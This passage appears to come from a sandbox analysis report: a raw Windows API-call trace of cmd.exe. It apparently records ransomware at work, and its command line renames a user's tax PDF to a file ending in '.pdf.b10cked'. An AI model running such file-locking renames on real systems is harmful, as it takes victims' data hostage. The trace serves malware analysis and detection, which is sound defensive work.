0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16039 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 16040 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 16041 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16042 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 16043 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 16044 start_va = 0x5b0000 end_va = 0x712fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 16045 start_va = 0x7b0000 end_va = 0x13affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Thread: id = 230 os_tid = 0xf78 [0141.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efa2c | out: lpSystemTimeAsFileTime=0x2efa2c*(dwLowDateTime=0x8e5a99e0, dwHighDateTime=0x1d440a9)) [0141.641] GetCurrentProcessId () returned 0xdd4 [0141.641] GetCurrentThreadId () returned 0xf78 [0141.641] GetTickCount () returned 0x2c62b [0141.641] QueryPerformanceCounter (in: lpPerformanceCount=0x2efa24 | out: lpPerformanceCount=0x2efa24*=19842986481) returned 1 [0141.642] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.642] __set_app_type (_Type=0x1) [0141.642] __p__fmode () returned 0x76b331f4 [0141.642] __p__commode () returned 0x76b331fc [0141.642] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.642] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.642] GetCurrentThreadId () returned 0xf78 [0141.642] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf78) returned 0x38 [0141.642] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.642] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.642] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.643] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.643] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef9bc | out: phkResult=0x2ef9bc*=0x0) returned 0x2 [0141.643] VirtualQuery (in: lpAddress=0x2ef9f3, lpBuffer=0x2ef98c, dwLength=0x1c | out: lpBuffer=0x2ef98c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.643] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef98c, dwLength=0x1c | out: lpBuffer=0x2ef98c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.643] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef98c, dwLength=0x1c | out: lpBuffer=0x2ef98c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.643] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef98c, dwLength=0x1c | out: lpBuffer=0x2ef98c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.643] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef98c, dwLength=0x1c | out: lpBuffer=0x2ef98c*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.643] GetConsoleOutputCP () returned 0x1b5 [0141.643] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.643] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.643] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.643] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.644] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.644] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.644] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.644] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.644] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.644] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.644] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.644] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.644] GetEnvironmentStringsW () returned 0x4c01d8* [0141.644] FreeEnvironmentStringsW (penv=0x4c01d8) returned 1 [0141.645] GetEnvironmentStringsW () returned 0x4c01d8* [0141.645] FreeEnvironmentStringsW (penv=0x4c01d8) returned 1 [0141.645] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee92c | out: phkResult=0x2ee92c*=0x40) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x0, lpData=0x2ee938*=0x0, lpcbData=0x2ee930*=0x1000) returned 0x2 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x1, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x0, lpData=0x2ee938*=0x1, lpcbData=0x2ee930*=0x1000) returned 0x2 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x0, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x40, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x40, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x0, lpData=0x2ee938*=0x40, lpcbData=0x2ee930*=0x1000) returned 0x2 [0141.645] RegCloseKey (hKey=0x40) returned 0x0 [0141.645] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee92c | out: phkResult=0x2ee92c*=0x40) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x0, lpData=0x2ee938*=0x40, lpcbData=0x2ee930*=0x1000) returned 0x2 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x1, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x0, lpData=0x2ee938*=0x1, lpcbData=0x2ee930*=0x1000) returned 0x2 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x0, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x9, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x9, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x0, lpData=0x2ee938*=0x9, lpcbData=0x2ee930*=0x1000) returned 0x2 [0141.645] RegCloseKey (hKey=0x40) returned 0x0 [0141.645] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.645] srand (_Seed=0x5b886370) [0141.645] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked\"" [0141.645] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked\"" [0141.646] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.646] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c1938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.646] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.646] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.646] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.646] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.646] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.646] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.646] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.646] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.646] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.646] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.646] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.646] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.646] GetEnvironmentStringsW () returned 0x4c2328* [0141.646] FreeEnvironmentStringsW (penv=0x4c2328) returned 1 [0141.646] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.646] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.646] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.646] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.647] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.647] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.647] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.647] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.647] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.647] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.647] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef6f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.647] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef6f8, lpFilePart=0x2ef6f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef6f4*="Desktop") returned 0x18 [0141.647] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.647] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef474 | out: lpFindFileData=0x2ef474) returned 0x4c0068 [0141.647] FindClose (in: hFindFile=0x4c0068 | out: hFindFile=0x4c0068) returned 1 [0141.647] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef474 | out: lpFindFileData=0x2ef474) returned 0x4c0068 [0141.647] FindClose (in: hFindFile=0x4c0068 | out: hFindFile=0x4c0068) returned 1 [0141.647] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef474 | out: lpFindFileData=0x2ef474) returned 0x4c0068 [0141.647] FindClose (in: hFindFile=0x4c0068 | out: hFindFile=0x4c0068) returned 1 [0141.647] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.647] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.648] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.648] GetEnvironmentStringsW () returned 0x4c2b48* [0141.648] FreeEnvironmentStringsW (penv=0x4c2b48) returned 1 [0141.648] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.648] GetConsoleOutputCP () returned 0x1b5 [0141.648] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.648] GetUserDefaultLCID () returned 0x409 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef838, cchData=128 | out: lpLCData="0") returned 2 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef838, cchData=128 | out: lpLCData="0") returned 2 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef838, cchData=128 | out: lpLCData="1") returned 2 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.649] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.650] GetConsoleTitleW (in: lpConsoleTitle=0x4b0918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.650] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.650] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.650] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.650] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.651] _wcsicmp (_String1="move", _String2=")") returned 68 [0141.651] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0141.651] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0141.651] _wcsicmp (_String1="IF", _String2="move") returned -4 [0141.651] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0141.651] _wcsicmp (_String1="REM", _String2="move") returned 5 [0141.651] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0141.654] GetConsoleTitleW (in: lpConsoleTitle=0x2ef530, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.654] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.654] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.654] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.654] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.654] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.654] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.654] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.654] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.654] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.654] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.654] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.654] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.654] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.654] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.654] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.654] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.655] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.655] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.655] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.655] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.655] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.655] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.655] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.655] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.655] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.655] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.655] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.655] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.655] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.655] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.655] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.655] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.655] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.655] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.655] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.656] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.656] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.656] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef2ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef2e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef2e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.658] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.658] _wcsicmp (_String1="TAXJKD~1.PDF", _String2=".") returned 70 [0141.658] _wcsicmp (_String1="TAXJKD~1.PDF", _String2="..") returned 70 [0141.658] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\taxjkd~1.pdf")) returned 0x20 [0141.658] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c1ec8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.658] SetErrorMode (uMode=0x0) returned 0x0 [0141.658] SetErrorMode (uMode=0x1) returned 0x0 [0141.658] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF", nBufferLength=0x104, lpBuffer=0x2eec74, lpFilePart=0x2eec5c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF", lpFilePart=0x2eec5c*="TAXJKD~1.PDF") returned 0x34 [0141.658] SetErrorMode (uMode=0x0) returned 0x1 [0141.658] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd")) returned 0x12 [0141.658] _wcsicmp (_String1="TAXJKD~1.PDF", _String2=".") returned 70 [0141.658] _wcsicmp (_String1="TAXJKD~1.PDF", _String2="..") returned 70 [0141.658] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\taxjkd~1.pdf")) returned 0x20 [0141.658] SetErrorMode (uMode=0x0) returned 0x0 [0141.659] SetErrorMode (uMode=0x1) returned 0x0 [0141.659] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF", nBufferLength=0x104, lpBuffer=0x2ef0f0, lpFilePart=0x2eee88 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF", lpFilePart=0x2eee88*="TAXJKD~1.PDF") returned 0x34 [0141.659] SetErrorMode (uMode=0x0) returned 0x1 [0141.659] SetErrorMode (uMode=0x0) returned 0x0 [0141.659] SetErrorMode (uMode=0x1) returned 0x0 [0141.659] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked", nBufferLength=0x104, lpBuffer=0x2ef2f8, lpFilePart=0x2eee88 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked", lpFilePart=0x2eee88*="TAXJKdn0yOKX7tSSpc.pdf.b10cked") returned 0x46 [0141.659] 